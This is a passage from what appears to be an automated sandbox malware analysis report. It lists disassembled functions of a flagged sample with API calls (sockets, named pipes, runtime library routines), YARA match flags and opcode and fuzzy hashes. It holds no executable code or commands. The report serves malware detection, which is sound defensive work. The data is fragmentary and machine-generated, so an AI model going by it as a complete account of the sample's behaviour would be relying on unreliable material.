                                              • Part of subcall function 007725F4: strchr.LIBCMT ref: 0077264C
                                              • Part of subcall function 007725F4: malloc.LIBCMT ref: 00772664
                                              • Part of subcall function 007725F4: malloc.LIBCMT ref: 00772671
                                              • Part of subcall function 007725F4: rand.LIBCMT ref: 0077273D
                                            • strchr.LIBCMT ref: 007721D6
                                            • _snprintf.LIBCMT ref: 0077220C
                                              • Part of subcall function 0077EA3C: _errno.LIBCMT ref: 0077EA73
                                              • Part of subcall function 0077EA3C: _invalid_parameter_noinfo.LIBCMT ref: 0077EA7E
                                            • _snprintf.LIBCMT ref: 00772223
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                                            • String ID: not create token: %d
                                            • API String ID: 1095232423-2272930512
                                            • Opcode ID: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
                                            • Instruction ID: eecbcf5e9a3662c753fff916bfb547a8c8741da10f5a546a6c264378942743c0
                                            • Opcode Fuzzy Hash: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
                                            • Instruction Fuzzy Hash: 36418162604E80D1EE119B2AD1492F8A3B0FF98BD5F099511DF8C67B22EF38D1B2C340
                                            Function 007C4A04 Relevance: 6.1, APIs: 4, Instructions: 80synchronizationCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • malloc.LIBCMT ref: 007C4A45
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                            • htonl.WS2_32 ref: 007C4A5B
                                              • Part of subcall function 007C4C44: PeekNamedPipe.KERNEL32 ref: 007C4C7C
                                            • WaitForSingleObject.KERNEL32 ref: 007C4AB6
                                            • free.LIBCMT ref: 007C4AF2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$AllocHeapNamedObjectPeekPipeSingleWait_callnewhfreehtonlmalloc
                                            • String ID:
                                            • API String ID: 2495333179-0
                                            • Opcode ID: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
                                            • Instruction ID: 0d639e2ceae0388d2cc5bd1fc0f034ff259e73f8d4cc2caf148d04085363c389
                                            • Opcode Fuzzy Hash: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
                                            • Instruction Fuzzy Hash: 3321D336704A40C5DB24EF22E564B2E77A9FB88BD8F09851CDE494B718DB3CC891C748
                                            Function 007CC230 Relevance: 6.1, APIs: 4, Instructions: 70stringCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _time64.LIBCMT ref: 007CC254
                                              • Part of subcall function 007D145C: GetSystemTimeAsFileTime.KERNEL32 ref: 007D146A
                                              • Part of subcall function 007D044C: _getptd.LIBCMT ref: 007D0454
                                            • malloc.LIBCMT ref: 007CC29C
                                            • strtok.LIBCMT ref: 007CC300
                                            • strtok.LIBCMT ref: 007CC311
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Timestrtok$FileSystem_getptd_time64malloc
                                            • String ID:
                                            • API String ID: 460628555-0
                                            • Opcode ID: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
                                            • Instruction ID: 9e77a40b1dd4b867fe12b622e77c0d3d15a7290e96561b139e582ad94227806c
                                            • Opcode Fuzzy Hash: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
                                            • Instruction Fuzzy Hash: F821B5B6610BD481DB00DF91F088A6D77A8F798BE4B56426EEF5E83741CB38C441C780
                                            Function 0078E9D8 Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0078E9FC
                                              • Part of subcall function 00780A00: _getptd.LIBCMT ref: 00780A16
                                              • Part of subcall function 00780A00: __updatetlocinfo.LIBCMT ref: 00780A4B
                                              • Part of subcall function 00780A00: __updatetmbcinfo.LIBCMT ref: 00780A72
                                            • _errno.LIBCMT ref: 0078EA08
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            • _invalid_parameter_noinfo.LIBCMT ref: 0078EA13
                                            • strchr.LIBCMT ref: 0078EA29
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                            • String ID:
                                            • API String ID: 4151157258-0
                                            • Opcode ID: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
                                            • Instruction ID: e32d4acecc93198e242a20c619128a08d91149d70543d1dc81365faf23efa689
                                            • Opcode Fuzzy Hash: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
                                            • Instruction Fuzzy Hash: 391131636882E481CB28B721D45423EBA90F381FE5B5CC135FBD60BA54DB2CC942CB52
                                            Function 007604D0 Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: clock
                                            • String ID:
                                            • API String ID: 3195780754-0
                                            • Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                                            • Instruction ID: 432986441e31799c6ca060811c90549fc7f0bb332886adfb8589f15e0e145a11
                                            • Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                                            • Instruction Fuzzy Hash: E8114822204748D55731EEA6A48092BF650FB843D0F290535EE4753202FA7CC891CF81
                                            Function 007B10D0 Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: clock
                                            • String ID:
                                            • API String ID: 3195780754-0
                                            • Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                                            • Instruction ID: d9dabda54bb386a79a854bae8b8f6d0e98be2ec0033b4287dbfa3c7c6e5f1c63
                                            • Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                                            • Instruction Fuzzy Hash: 5B116B3260474C855731EEAA78906A7F660F7843D0F9A0132EF4853705E97CC881C750
                                            Function 007DF5D8 Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007DF5FC
                                              • Part of subcall function 007D1600: _getptd.LIBCMT ref: 007D1616
                                              • Part of subcall function 007D1600: __updatetlocinfo.LIBCMT ref: 007D164B
                                              • Part of subcall function 007D1600: __updatetmbcinfo.LIBCMT ref: 007D1672
                                            • _errno.LIBCMT ref: 007DF608
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            • _invalid_parameter_noinfo.LIBCMT ref: 007DF613
                                            • strchr.LIBCMT ref: 007DF629
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                            • String ID:
                                            • API String ID: 4151157258-0
                                            • Opcode ID: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
                                            • Instruction ID: d2f68982df2799dcf4d1ab981d9ae4d9a2b5fe84739fe6c0dc9cee05003a332e
                                            • Opcode Fuzzy Hash: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
                                            • Instruction Fuzzy Hash: 0F1127636082E491CB205B25E05423EB7B0E384FD4B5C8137EAD74BFB5DA6CC582C710
                                            Function 007CEF5C Relevance: 6.0, APIs: 4, Instructions: 39networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • accept.WS2_32 ref: 007CEF71
                                            • send.WS2_32 ref: 007CEFAF
                                            • send.WS2_32 ref: 007CEFC3
                                            • closesocket.WS2_32 ref: 007CEFD4
                                              • Part of subcall function 007CF098: closesocket.WS2_32 ref: 007CF0A4
                                              • Part of subcall function 007CF098: free.LIBCMT ref: 007CF0AE
                                              • Part of subcall function 007CF098: free.LIBCMT ref: 007CF0B7
                                              • Part of subcall function 007CF098: free.LIBCMT ref: 007CF0C0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$closesocketsend$accept
                                            • String ID:
                                            • API String ID: 47150829-0
                                            • Opcode ID: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
                                            • Instruction ID: 55be0655451ad6f155f642c8cf7aafcc341c09a67531ee572ff2d76fb50e619c
                                            • Opcode Fuzzy Hash: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
                                            • Instruction Fuzzy Hash: 7801A735708A4481DB649F36FA69B3D2321E78EFF4F049219DE2A07B45CE3CC4828B40
                                            Function 007C53EC Relevance: 6.0, APIs: 4, Instructions: 34sleeppipeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CountTick$NamedPeekPipeSleep
                                            • String ID:
                                            • API String ID: 1593283408-0
                                            • Opcode ID: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                                            • Instruction ID: 6311e74ae0b42aa8aa7b814ac48dd4174b72cfca121611b360ea0cde81339702
                                            • Opcode Fuzzy Hash: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                                            • Instruction Fuzzy Hash: 82F0A432618E90C2E7148B25F84471AA3A9F788B81F644128EB8D82A65EF3DD5C28B05
                                            Function 007C48D8 Relevance: 6.0, APIs: 4, Instructions: 32sleeppipeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CountTick$NamedPeekPipeSleep
                                            • String ID:
                                            • API String ID: 1593283408-0
                                            • Opcode ID: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                                            • Instruction ID: 32d3647d56aa391de904bdd09a327b3fe9feffb39ee4db4619f4ab1fd5ba88d9
                                            • Opcode Fuzzy Hash: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                                            • Instruction Fuzzy Hash: 1EF0C832A18A9183F7108B15F85471BB7B5F7C9B94F644128DB8943A75DF3DC882CB04
                                            Function 007C76F0 Relevance: 6.0, APIs: 4, Instructions: 32memorythreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • InitializeProcThreadAttributeList.KERNEL32 ref: 007C770E
                                            • GetProcessHeap.KERNEL32 ref: 007C7714
                                            • HeapAlloc.KERNEL32 ref: 007C7724
                                            • InitializeProcThreadAttributeList.KERNEL32 ref: 007C773F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AttributeHeapInitializeListProcThread$AllocProcess
                                            • String ID:
                                            • API String ID: 1212816094-0
                                            • Opcode ID: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                                            • Instruction ID: 6ecf861463d60d2f010408bc7ff46dfc7d6251e1cbc446479edfebd718935ab9
                                            • Opcode Fuzzy Hash: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                                            • Instruction Fuzzy Hash: 4FF02B2672968882DB488B35F44175A63A4EB8CB90F59542DFA0F42724CE3CC445CF00
                                            Function 007CF098 Relevance: 6.0, APIs: 4, Instructions: 15COMMON
                                            Download Yara Rule
                                            APIs
                                            • closesocket.WS2_32 ref: 007CF0A4
                                            • free.LIBCMT ref: 007CF0AE
                                              • Part of subcall function 007CF244: HeapFree.KERNEL32 ref: 007CF25A
                                              • Part of subcall function 007CF244: _errno.LIBCMT ref: 007CF264
                                              • Part of subcall function 007CF244: GetLastError.KERNEL32 ref: 007CF26C
                                            • free.LIBCMT ref: 007CF0B7
                                            • free.LIBCMT ref: 007CF0C0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$ErrorFreeHeapLast_errnoclosesocket
                                            • String ID:
                                            • API String ID: 1525665891-0
                                            • Opcode ID: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
                                            • Instruction ID: ac185cc5669652c4561bda81659917c917849fc1b99d393f86448571d66200f5
                                            • Opcode Fuzzy Hash: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
                                            • Instruction Fuzzy Hash: C7D06726614444C1DF14FBB2D8AA72C1721F798F94F140039DE1E8B265CD6CC895C344
                                            Function 00401FD0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMON
                                            Download Yara Rule
                                            Strings
                                            • Unknown pseudo relocation bit size %d., xrefs: 00402294
                                            • Unknown pseudo relocation protocol version %d., xrefs: 004022A8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                            • API String ID: 0-395989641
                                            • Opcode ID: 46b8cc2d54abce7c7c7d07232f07b04759b4e10a12a30095010051897671b5f5
                                            • Instruction ID: 8c8005ec778b1d8b89afdaa8f366cc80ce98c81ac44c8c214e0d273334ccb7fd
                                            • Opcode Fuzzy Hash: 46b8cc2d54abce7c7c7d07232f07b04759b4e10a12a30095010051897671b5f5
                                            • Instruction Fuzzy Hash: 1A711276B10B9487DB20CF61DA4875A7761FB59BA8F54822AEF08277E8DB7CC540C608
                                            Function 00401DC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • Address %p has no image-section, xrefs: 00401DC0, 00401FA5
                                            • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: QueryVirtual
                                            • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                            • API String ID: 1804819252-157664173
                                            • Opcode ID: 4222c966f1866e0347074a23eb8cec22519ab6179e0d58ab4d36e181926c5116
                                            • Instruction ID: 3b33824f85b17f90b3a42b000daced5dafaf341a27cace3064c240a44d9835c1
                                            • Opcode Fuzzy Hash: 4222c966f1866e0347074a23eb8cec22519ab6179e0d58ab4d36e181926c5116
                                            • Instruction Fuzzy Hash: C43106B3701A41A6EB128F12ED417593761B755BEAF48413AEF0C173A1EB3CD986C788
                                            Function 00401010 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: __set_app_type
                                            • String ID: 06E$P0E
                                            • API String ID: 1108511539-3978550416
                                            • Opcode ID: 06cb82f9406a8be62de34f6836860520eff65df27a116840868cf6d0d4190e7e
                                            • Instruction ID: 4660481e8b01e839d5568f54d4753b0e48e28ce44faaa9a024d6f640f261ebc1
                                            • Opcode Fuzzy Hash: 06cb82f9406a8be62de34f6836860520eff65df27a116840868cf6d0d4190e7e
                                            • Instruction Fuzzy Hash: C52180B5600A41C7D7149F25D85136A37A1B785B49F818037DB4967BF5CB7DC8C0CB18
                                            Function 0077EC60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _errno.LIBCMT ref: 0077ECB1
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            • _invalid_parameter_noinfo.LIBCMT ref: 0077ECBC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                            • String ID: B
                                            • API String ID: 1812809483-1255198513
                                            • Opcode ID: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
                                            • Instruction ID: 54b03a5859b282b8a337173d91da853d2c20a05d016ec228964154f02cc349b3
                                            • Opcode Fuzzy Hash: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
                                            • Instruction Fuzzy Hash: 280180B2624B54C6EB109F12E444399B665F798FE4F988325AF5C17BA5CF3CD245CB00
                                            Function 007CF860 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _errno.LIBCMT ref: 007CF8B1
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            • _invalid_parameter_noinfo.LIBCMT ref: 007CF8BC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                            • String ID: B
                                            • API String ID: 1812809483-1255198513
                                            • Opcode ID: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                                            • Instruction ID: 4303b45e746caded6edeb4eec735b6c34950cf6d25104996cccb1d036f018ff5
                                            • Opcode Fuzzy Hash: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                                            • Instruction Fuzzy Hash: 42015B72624B4086DB109F12E444759B7A1FBA8FE4FA84329AB5817BA9CF3CC146CB00
                                            Function 00401C40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • Unknown error, xrefs: 00401D2C
                                            • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: fprintf
                                            • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                            • API String ID: 383729395-3474627141
                                            • Opcode ID: 060ed8b4f48fff566cb5ba301f549a09f8373ce553815899d5138d05545a2a64
                                            • Instruction ID: 59ce1e855a84c40590a6f1d7e5fdbb5789b26ea1a6d81feca49222ead83698e2
                                            • Opcode Fuzzy Hash: 060ed8b4f48fff566cb5ba301f549a09f8373ce553815899d5138d05545a2a64
                                            • Instruction Fuzzy Hash: 19016163918F88C3D6018F18E8003AA7331FB6E749F259316EF8C26565DB39D592C704
                                            Function 00401CE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • Argument domain error (DOMAIN), xrefs: 00401CE0
                                            • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: fprintf
                                            • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                            • API String ID: 383729395-2713391170
                                            • Opcode ID: ffb7db3649f765f6754a53c0185fc82a21da43e3d5c879aecf4419589f6ac527
                                            • Instruction ID: 19d1ab342afe3ad9ea86bf5e66ade9d92ee5eaa311f738746577795edc5800f2
                                            • Opcode Fuzzy Hash: ffb7db3649f765f6754a53c0185fc82a21da43e3d5c879aecf4419589f6ac527
                                            • Instruction Fuzzy Hash: 5EF06256858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                                            Function 00401CF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                            • Partial loss of significance (PLOSS), xrefs: 00401CF0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: fprintf
                                            • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                            • API String ID: 383729395-4283191376
                                            • Opcode ID: 18191e57db33b4e70e59b5a3d3e3df1f7191def02d3bc11653a7ff43ad774231
